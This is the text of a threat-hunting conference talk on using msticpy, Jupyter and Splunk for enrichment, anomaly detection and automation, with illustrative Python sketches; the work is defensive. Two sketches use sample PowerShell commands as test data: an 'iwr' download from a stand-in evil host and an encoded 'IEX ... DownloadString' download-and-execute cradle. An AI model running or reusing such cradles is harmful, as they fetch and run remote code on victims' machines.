Practical msticpy use ~ rainbow bridge to SIEM for advanced threat hunting ~


September 8, 2023




Security Engineer & Researcher



$WHOAMI
• Threat Hunter / App Developer / Threat Researcher
• OSS Contributor: msticpy, unprotect, atomic-red-team, cuckoo, capev2, ...
• Qualifications: 7 GIACs, CISSP, CISA
• Full-stack Engineer, Service Dev/Operation, SOC Analyst, MSSP, CSIRT Incident Handler, Forensic, Threat Researcher/binarian, AI Anti-Virus
• Fighting injustice attack world !


$more GoAhead Inc.
• CEO: Mitsuhiro Nakamura
• Established in 2017
• Data Analysis Company: Splunk is our strength for Security Challenges
• Splunk .conf 2017 @USA, Splunk Champion
• Free Splunk App/Add-ons by GoAhead
• KOBANZAME (IP Whois DB)
• Heuristic Logic, Data Visualization
• Aim for maximum effectiveness with minimum resources


Agenda
• Invariable Operation with SIEM
• msticpy 101 Overview and Basics
• msticpy 201 Jupyter Notebook and ( pros | cons )
• msticpy 301 Practical use case
• Take Away


Invariable Operation with SIEM


Background and Issues
Old fashioned
• Analysis: Human-wave tactics for raw log
• Monitoring: Alert by Email
Nowadays
• Analysis: Multi-axis search of formatted logs
• Monitoring: Visualized Dashboard, Alert from SIEM
Never ending Dev & Ops tasks (Documentation, Modify Thresholds, Bugs, Update, Add Panels)
• Modification and addition of analytical logic to keep up with new threats
• Thresholds tailored to the internal situation as well as the threat situation in the world
SIEM functions and existing dashboards
• Biases sometimes lead to non-free analysis


Objective: Advanced Threat Hunting
Threat Hunting
• Proactive detection and response to signs of malicious activity or threats
• Investigate using threat intelligence, unapplied IOCs, anomaly detection
• Iterations between hypothesis and verification
Advanced Threat Hunting
• Identifying undetected threats from raw data
  • Check raw data too and look for omissions in processing and detection by security products
• Inherently data analysis with freedom (ad hoc)
  • Uniquely conceived analytical logic
  • Unrestricted external collaboration
  • Eccentric visualization
  • Emphasis that is easy for readers to understand
• Continuous update operation
  • Machine Learning & Deep Learning (ML/DL)
  • Automation


Security Information and Event Management
• First Generation (Gartner 2005): Log and Event management integration
• Second Generation: Correlation analysis with CTI, Big data processing
• Third Generation (Gartner 2017): UEBA, SOAR addition
• SIEM Products
  • Splunk / MS Sentinel / IBM QRadar / Exabeam / Sumo Logic / Elastic, etc.
• SIEM by Security vendors
  • Can collect/extract/search/analyze/visualize/detect/respond
  • Have the individual threat hunting function
  • Have ML/DL extensions
source: Gartner Inc, 2022 Magic Quadrant


SIEM’s advantage
• Rapid search by indexing and field normalization (CIM, ASIM)
• Statistical calculations are easy with the benefit of its search language
• Can store threat intelligence
• Multiple analysts can see the same data and analysis results
• SIEM vendors also provide a lot of detection logic


SIEM's breakdown
• Rapid search by indexing and field normalization (CIM, ASIM)
  • If extraction fails, the data is missing from the search at the beginning or from the analysis along the way.
• Statistical calculations are easy with the benefit of its search language
  • There is some processing it is not good at, and learning the search language takes time and cost.
• Can store threat intelligence
  • Most of the intelligence has to be prepared and operated by ourselves.
• Multiple analysts can see the same data and analysis results
  • Various limitations due to shared resources
• SIEM vendors also provide a lot of detection logic
  • Necessary and sufficient? No!


Relying too much on SIEM analysis is not recommended!
• When a failure occurs, no one can analyze anything until recovery.
• Over-reliance on analysis in the SIEM search language only leads to forgetting how to analyze raw data.
• Who will ensure the integrity of the data and search results in SIEM?
• Limitations of SIEM
  • Default upper limits for subsearch and multivalue fields (truncate)
  • Default upper limit for number of plots on graph (truncate)
  • Difficult to notice search omissions due to misconfiguration
• Don't rely solely on the logic provided by the SIEM vendor
  • Enterprise SIEMs Miss 76 Percent of MITRE ATT&CK Techniques
  • source: CardinalOps, "2023 Report on State of SIEM Detection Risk"


For Advanced Threat Hunting
[Figure: msticpy alongside SIEM, labeled with Automation, Infinite Visualization, Machine Learning, Data Validation, Consistent I/O, Time Series Analysis]


msticpy 101 Overview and Basics


msticpy: Microsoft Threat Intelligence Center (MSTIC) on Python and Jupyter Notebooks
• MSTICpy: OSS library developed by Microsoft's MSTIC
• Written in Python, usually used on Jupyter Notebooks
• Extensive functionality for breach investigation and threat hunting
• Available since March 2019, 200k+ downloads
• Presented at BlackHat USA 2020
• Frequently updated recently and continues to evolve
• Still few users and blog articles in Asia and Japan
• Its functions broadly fall into the following four processes: Data Acquisition, Data Processing, Analysis including ML, Visualization
• Because it is library-based, you can use only the functions you need, piecemeal


msticpy’s Documentation & Resources
• MSTICpy ☞ "msticpy" in this presentation
• Official document
  • Word count 100k+
  • RST files 80+
• Jupyter Notebook samples 40+
• Past training resources
  • msticpy-lab, msticpy-training GitHub repos
• Official Blog
• Time-consuming for learning with the huge resources ...


msticpy Capabilities
[Figure: capability map. Acquisition (Querying Logs), Enrichment (Data Enrichment), Analysis (Utility, Pivot, Security Analysis), Visualization (Data Visualization), all configured through msticpyconfig.yaml] https://twi


msticpy Data Flow Diagram
[Figure: data flow through a Jupyter Notebook]
• Acquisition: raw data from the SIEM / DataLake (SIEM)
• Enrichment (Internet): Threat Intel Lookup; Whois, GeoIP
• Local Analysis: Decode, Extract, ML
• Visualization
• Upload: enriched ("rich") data back to the SIEM


msticpy: Data Acquisition (1)
• Create an instance of Query Provider
• Select from data sources (left picture)
  • LocalData: connect to .pkl files in ./data dir
  • Splunk: connect to Splunk REST port with msticpyconfig.yaml
• The communication channel is NOT independently encrypted by msticpy's own functions => HTTPS (SSL) is necessary


msticpy: Data Acquisition (2)
• Return: Pandas DataFrame
• Ad hoc query function
  • exec_query(): arbitrary query
• Built-in query function
  • Select from the list, which varies by data source
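The two acquisition slides can be sketched roughly as follows, assuming msticpy is installed and a Splunk entry already exists in msticpyconfig.yaml. `QueryProvider`, `connect()` and `exec_query()` are the msticpy names used on the slides; `normalize_spl`, `fetch_events` and `connect_splunk` are hypothetical helpers added only for illustration.

```python
def normalize_spl(query: str) -> str:
    """Prefix 'search' when the SPL does not already start with a command.

    Splunk's REST search endpoint expects a query that begins with
    'search' or with a generating command introduced by '|'.
    """
    stripped = query.strip()
    if stripped.startswith("|") or stripped.lower().startswith("search "):
        return stripped
    return f"search {stripped}"


def fetch_events(provider, query: str):
    """Run an ad hoc query; msticpy providers return a pandas DataFrame."""
    return provider.exec_query(normalize_spl(query))


def connect_splunk():
    """Create and connect a Splunk provider (needs msticpy and a reachable Splunk)."""
    from msticpy.data import QueryProvider  # imported lazily: optional dependency

    provider = QueryProvider("Splunk")
    provider.connect()  # assumption: connection settings come from msticpyconfig.yaml
    return provider
```

In a notebook this would be used as `qry_prov = connect_splunk()` followed by `df = fetch_events(qry_prov, 'index="botsv2" | head 100')`, where the index name is only an example. Keeping the connection step separate makes it easy to point the Splunk host setting at an HTTPS endpoint, as the first slide requires.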


msticpy: Enrichment
• Threat Intel Lookup
  • Pivot TI function (only on Jupyter Notebook)
  • TILookup class (also available in plain Python programs)
• GeoIP (MaxMind GeoLite2, IPStack)
• IPWhois (Cymru, RADB, RDAP)


msticpy: Analysis (Utility)
• Base64 Decode
• IoC Extract
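To make the "IoC Extract" step concrete, here is a minimal standard-library sketch of regex-based extraction. It is a stand-in for the idea, not msticpy's extractor: the three patterns, the `IOC_PATTERNS` table and the `extract_iocs` helper are assumptions made for illustration and are far less strict than a production extractor.

```python
import re

# Deliberately simple patterns (assumptions for illustration only).
IOC_PATTERNS = {
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
    "url": re.compile(r"\bhttps?://[^\s'\"<>)]+", re.IGNORECASE),
    "md5_hash": re.compile(r"\b[a-fA-F0-9]{32}\b"),
}


def extract_iocs(text: str) -> dict:
    """Return the unique matches for each IoC type, in order of appearance."""
    found = {}
    for ioc_type, pattern in IOC_PATTERNS.items():
        # dict.fromkeys drops duplicates while keeping first-seen order
        matches = list(dict.fromkeys(pattern.findall(text)))
        if matches:
            found[ioc_type] = matches
    return found


# Made-up command line used only to exercise the patterns.
command = "powershell iwr http://evil.example.com/a.ps1 -o a.ps1; ping 10.0.0.5"
iocs = extract_iocs(command)
print(iocs)
```

Returning a dictionary keyed by IoC type keeps the result easy to turn into DataFrame rows for the enrichment step.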


msticpy: Analysis (Pivot)
• Pivot functions basically need to be loaded with "init_notebook()" first
• Wrap msticpy functions and classes for ease of discovery and use
• Standardization of function parameters, syntax, and output format
• “.mp_pivot.” can be piped in multiple stages


msticpy: Analysis (Security)
• Event Clustering
  • Classification of “process and logon events” on the host machine
• Time Series Analysis
  • Anomaly detection in time series data considering seasonal variations
• Outlier Identification
  • Outlier detection using decision trees
• Anomalous Session
  • Unusual pattern detection of rare event sequences with low likelihood
  • Use of the event’s command name, its parameter names and values
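The "Anomalous Session" idea, scoring sessions by how likely their event sequence is, can be illustrated with a small first-order Markov chain. This is a simplified sketch under stated assumptions: it uses only command names (no parameter names or values), Laplace smoothing, and made-up session data, and it is not msticpy's implementation.

```python
import math
from collections import Counter, defaultdict

START, END = "<start>", "<end>"


def fit_transitions(sessions):
    """Count command-to-command transitions over all sessions."""
    counts = defaultdict(Counter)
    for session in sessions:
        steps = [START, *session, END]
        for prev, nxt in zip(steps, steps[1:]):
            counts[prev][nxt] += 1
    return counts


def session_likelihood(session, counts, vocab_size, alpha=1.0):
    """Geometric mean of smoothed transition probabilities (higher = more usual)."""
    steps = [START, *session, END]
    log_prob = 0.0
    for prev, nxt in zip(steps, steps[1:]):
        total = sum(counts[prev].values())
        prob = (counts[prev][nxt] + alpha) / (total + alpha * vocab_size)
        log_prob += math.log(prob)
    return math.exp(log_prob / (len(steps) - 1))


# Hypothetical sessions: twenty routine ones and a single unusual one.
sessions = [["Get-Mailbox", "Set-Mailbox"]] * 20 + [
    ["Get-Mailbox", "New-InboxRule", "Set-Mailbox"]
]
counts = fit_transitions(sessions)
vocab = {cmd for s in sessions for cmd in s} | {END}
scores = [session_likelihood(s, counts, len(vocab)) for s in sessions]
rarest = sessions[scores.index(min(scores))]
print(rarest)
```

Using the geometric mean rather than the raw product keeps long sessions from being penalized simply for their length.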


msticpy: Visualization
• Implemented with BokehJS
• Viz charts implemented in msticpy
  • Timeline, ProcessTree, Folium Map, Matrix Plot, Entity/Network Graph, etc.
• Can create additional charts with MorphCharts


msticpy 201 Jupyter Notebook and ( pros | cons )


Benefits of Analyzing with Jupyter Notebook
• Reproducibility of data: intermediate results can be output at each step
• Easy combination/integration with external sources
• Easy use of ML/DL frameworks
• Extensive visualization libraries at your disposal
• Gain applied skills as a data scientist


Ideal Relationship between Jupyter Notebook and SIEM
[Figure: SIEM performs rough noise reduction; msticpy performs deep analysis on the denoised data, combined with intelligence and knowledge, for Advanced Threat Hunting]


msticpy’s pros: Seasonal-Trend decomposition using LOESS
• Book: also covered in “Machine Learning for Security Engineers”, Chapter 6 “Anomaly Detection”
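Seasonal-trend decomposition splits a series into seasonal, trend and residual parts and treats unusually large residuals as anomalies. The sketch below shows only that residual idea with the standard library: it swaps LOESS for a per-phase median baseline and scores residuals with a robust z-score, so it is a simplified stand-in rather than STL itself. The function names, the threshold of 3.5 and the synthetic data are assumptions.

```python
from statistics import median


def seasonal_residuals(values, period):
    """Subtract the per-phase median (a crude seasonal baseline) from each point."""
    baseline = [median(values[phase::period]) for phase in range(period)]
    return [v - baseline[i % period] for i, v in enumerate(values)]


def flag_anomalies(values, period, threshold=3.5):
    """Return indexes whose residual has a robust z-score above the threshold."""
    residuals = seasonal_residuals(values, period)
    center = median(residuals)
    mad = median(abs(r - center) for r in residuals)
    if mad == 0:
        # More than half the residuals are identical; any deviation stands out.
        return [i for i, r in enumerate(residuals) if r != center]
    return [
        i
        for i, r in enumerate(residuals)
        if 0.6745 * abs(r - center) / mad > threshold
    ]


# Synthetic event counts: a repeating 6-step pattern with small jitter,
# plus one injected spike at index 20.
pattern = [10, 12, 30, 50, 30, 12]
values = [pattern[i % 6] + ((i // 6) % 3 - 1) for i in range(48)]
values[20] += 40
anomalies = flag_anomalies(values, period=6)
print(anomalies)
```

A median baseline has no trend component, so for data with drift a real STL implementation such as the one in statsmodels is the better fit.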


msticpy’s pros: Consistent I/O
• Sending by the Data Uploader function (Transfer)
  • Only Azure Sentinel and Splunk are supported as of Aug 2023
  • Can upload a DataFrame, File, or Folder
• Visualization charts cannot be transferred. However, similar Viz can be drawn in SIEM from the transferred results.
[Figure: OSINT (Internet), msticpy and SIEM, captioned "msticpy Enriching SIEM !"]


Jupyter & msticpy’s pros: Data Validation
• Check the DataFrame result sequentially
• Guard against accidental overwriting with the copy() function
• Value type conversion and stripping of null values
• Easy to validate character codes
• GUI for time ranges ☞
• Confirm the actual query in advance via the Query Provider's “print” option (figure caption: Query to be searched)


Jupyter’s pros: Use of much ML/DL
• Only a few ML models are built into msticpy
  • Event Clustering ☞ DBSCAN in scikit-learn
  • Time Series Analysis and Anomalies ☞ STL in statsmodels
  • Outlier Identification ☞ IsolationForest in scikit-learn
  • Less parameter tuning is required since they are specialized for commonly used threat hunting applications
• Flexibility to use Python's rich ML/DL libraries (NLP, ML, DL)


Jupyter’s pros: Infinite Visualization
Maximum number of data plots (by default)
• Splunk: 10,000
• MS Sentinel: 10,000
• Jupyter: ♾ (Infinity)
This data was truncated in Splunk!


[FYI] Change the upper limit in the dashboard options • We can change the limit with the dashboard option "” in Splunk, but...


Jupyter’s pros: Automation with papermill
• Python library
• Batch execution of Notebook files with different parameters
• Introduced in the "Put it into Operation" section at the end of msticpy's training materials
[Figure: running papermill from the CUI and from Python; parameters are overwritten in the output notebook ☟]
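Batch execution with different parameters can be sketched by generating one `papermill` command line per parameter set. The `papermill <input> <output> -p <name> <value>` form is papermill's CLI; the notebook name, output directory, parameter names and the `papermill_command` helper are hypothetical. The template notebook is assumed to contain a cell tagged `parameters`, which papermill overrides in the output notebook.

```python
import shlex
from pathlib import Path


def papermill_command(template: str, output_dir: str, params: dict) -> list:
    """Build one `papermill` CLI call; each parameter becomes `-p name value`."""
    suffix = "_".join(str(v) for v in params.values())
    output = Path(output_dir) / f"{Path(template).stem}_{suffix}.ipynb"
    command = ["papermill", template, str(output)]
    for name, value in params.items():
        command += ["-p", name, str(value)]
    return command


# Hypothetical parameter sets: one hunting notebook, run once per host.
runs = [
    {"hostname": "wks-001", "lookback_days": 7},
    {"hostname": "srv-db-02", "lookback_days": 30},
]
commands = [papermill_command("hunt_template.ipynb", "out", p) for p in runs]
for cmd in commands:
    # Printed only; pass `cmd` to subprocess.run(cmd, check=True) to execute.
    print(shlex.join(cmd))
```

From Python, the equivalent call is `papermill.execute_notebook(input_path, output_path, parameters={...})`. Writing each run to its own output notebook keeps the executed parameters and results together for later review.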


Jupyter’s cons: Security Concerns about Data Transfer
• Possibility of transferring sensitive data in SIEM to an external Jupyter
  • Handling it with SIEM’s ACL may be the only way.
• Eavesdropping/MITM attack during data transfer to Jupyter
  • SSL security depends on the SIEM side
• More complicated security design
• Transferring Threat Intelligence data to SIEM is relatively clear.
[Figure: data transfer between msticpy (Jupyter) and SIEM]


msticpy 301 Practical use case


Toward Practical msticpy Use
• Push direction is fine
  • Intelligence is collected from external sources, analyzed and processed, and transferred to SIEM
• Pull direction has the security concern of data transfer.
  • Planning a new security design from scratch for msticpy alone is a hurdle.
• SIEM vendors' advanced analytical tricks with Jupyter
  • MS Sentinel ☞ "Microsoft Azure Machine Learning Workspace"
    • Completed within Azure
  • Splunk ☟ "Splunk App for Data Science and Deep Learning (DSDL)"
    • Preparing machine resources such as Docker containers externally
    • Data exchange between containers and Splunk
    • Installing msticpy on the container side
+ Store the credential strings in “Azure Key Vault” and load them from there
[Figure: msticpy inside Splunk DSDL]


$more Splunk App for DSDL
• single-instance | side-by-side
• Implemented data security features
  • Use of proprietary SSL certificates
  • Custom password settings for Jupyter
  • Fine-grained ACL design with Splunk access tokens
• Splunk MLTK commands can interact with containers
  • | fit ( Training to create a model )
  • | apply ( Apply the trained model to the data for identification )


Use Case: PowerShell process command line (1)
[Figure: Search in Splunk (powershell -enc) ☞ | fit (required the first time for model creation) ☞ Decode base64 ☞ Delete null byte (\x00) ☞ Extract IoC ☞ Enrichment IoC ☞ Return to Splunk; later runs use | apply]
• Originally, this mechanism is prepared for ML/DL algorithms, so I developed a custom model incorporating msticpy.
• By executing the fit command, one .py file is created in the app/model directory; the file consists of the functions exported from the .ipynb
https://
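The decode stages of this pipeline can be sketched with the standard library alone. This is an illustration of the steps named on the slide (decode base64, delete null bytes, extract IoC), not the custom model itself, which uses msticpy inside the DSDL container. The regular expressions, the helper name, and the sample command with its documentation-range IP address are all made up for the example.

```python
import base64
import re

# Simplified: matches -e, -enc and -encodedcommand, not every abbreviation
# that PowerShell accepts.
ENC_FLAG = re.compile(
    r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE
)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)


def decode_encoded_command(command_line: str):
    """Return the decoded script from `powershell -enc <base64>`, or None."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    raw = base64.b64decode(match.group(1))
    # PowerShell encodes the script as UTF-16LE, so ASCII text arrives with a
    # \x00 after every character; dropping those bytes is the slide's step.
    return raw.replace(b"\x00", b"").decode("utf-8", errors="replace")


# Build a sample the same way PowerShell would encode it.
script = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
sample = "powershell.exe -NoP -enc " + base64.b64encode(
    script.encode("utf-16-le")
).decode()

decoded = decode_encoded_command(sample)
urls = URL.findall(decoded)
print(decoded)
print(urls)
```

Stripping null bytes works for ASCII scripts; for scripts containing non-ASCII characters, decoding the bytes as UTF-16LE directly would be the safer choice.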


Use Case: PowerShell process command line (2)
[Figure: | fit and | apply search results in Splunk showing the msticpy results] ※Example of Splunk botsv2 dataset


Take Away
• Relying too much on SIEM analysis is not recommended!
• msticpy's missionary work: happy to see more APAC users
• Let’s analyze and code on Jupyter Notebook to hone your skills!
• Let’s get on existing mechanisms for data security concerns!
• Let’s become a contributor to your favorite OSS.
Happy msticpying!


Thank you!